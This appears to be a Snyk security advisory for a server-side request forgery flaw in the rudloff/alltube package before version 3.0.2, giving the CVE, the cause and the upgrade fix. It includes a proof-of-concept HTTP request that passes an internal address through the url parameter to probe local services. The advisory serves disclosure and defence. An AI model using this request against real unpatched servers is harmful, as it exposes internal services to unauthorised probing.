Server-side Request Forgery (SSRF) Affecting rudloff/alltube package, versions <3.0.2


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.25% (65th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Server-side Request Forgery (SSRF) vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-PHP-RUDLOFFALLTUBE-2414031
  • published28 Feb 2022
  • disclosed28 Feb 2022
  • creditAnna

Introduced: 28 Feb 2022

CVE-2022-0768  (opens in a new tab)
CWE-918  (opens in a new tab)

How to fix?

Upgrade rudloff/alltube to version 3.0.2 or higher.

Overview

rudloff/alltube is a HTML GUI for youtube-dl.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to missing sanitization of URL query parameters in the youtube-dl command. Exploiting this vulnerability makes it possible for any unauthenticated user to pass internal hostnames in the URL parameter and obtain information about that service from the response.

PoC:

GET /alltube/index.php/info?url=http://127.0.0.1:22 HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/alltube/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qcnp4gcfj3ni5c02u60ivovj0l
Connection: close

CVSS Scores

version 3.1